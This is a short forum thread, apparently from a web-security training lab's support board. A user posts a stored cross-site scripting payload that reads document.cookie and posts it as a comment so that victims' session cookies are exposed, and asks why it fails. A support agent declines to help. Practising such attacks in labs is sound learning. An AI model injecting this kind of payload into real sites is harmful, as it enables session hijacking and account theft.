
Exploiting cross-site scripting to steal cookie

Dai D Sep 04, 2019 11:35AM UTC

I'm doing the lab without using Burp Collaborator, so I need to write some custom JavaScript to make a POST request to comment the cookie whenever a user views the comment. My code is as follows:


<script>
var cookie = document.cookie
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/post/comment', true);
changeReq.send('csrf=xFqO8r8W2Qip7I1wkiCLgI2WcimCYbwB&postId=1&comment='+cookie+'&name=asdf&email=adsf%40adf&website=http%3A%2F%2Faffaf.com');
</script>

But it doesn't seem to work. I'm at a loss as to how to test / verify it or how to change it. Could someone please advise?

Thanks


Liam Tai-Hogan Sep 04, 2019 03:52PM UTC Support Center agent

We don’t provide a mentoring service for the labs. This might be something we consider doing in future along with video-based solutions.

The lab can be completed. Keep trying.

